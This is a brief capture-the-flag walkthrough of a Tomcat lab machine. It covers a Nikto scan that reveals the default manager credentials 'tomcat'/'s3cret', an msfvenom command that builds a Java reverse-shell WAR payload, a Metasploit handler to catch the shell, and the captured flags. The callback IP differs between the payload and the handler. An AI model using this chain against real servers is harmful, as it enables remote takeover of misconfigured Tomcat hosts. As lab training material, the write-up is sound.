10.10.10.95

+ Server: Apache-Coyote/1.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/21630 0x1525691762000
+ OSVDB-39272: favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ Default account found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 's3cret'). Apache Tomcat.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /manager/status: Tomcat Server Status interface found (pass protected)
+ 7604 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2018-07-04 16:01:37 (GMT1) (310 seconds)

+ Default tomcat account found for ‘Tomcat Manager Application’ at /manager/html (ID ‘tomcat’, PW ‘s3cret’). Apache Tomcat.

http://10.10.10.95:8080/manager/html

root@kali:~# msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.8 LPORT=4444 -f war > algo.war


msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf exploit(multi/handler) > set LHOST 10.10.14.7
LHOST => 10.10.14.7
msf exploit(multi/handler) > run

You upload the file to the manager and open it, and that's all.

C:\Users\Administrator\Desktop\flags>more "2 for the price of 1.txt"
more "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0...

root.txt
04a8b36e1545a455...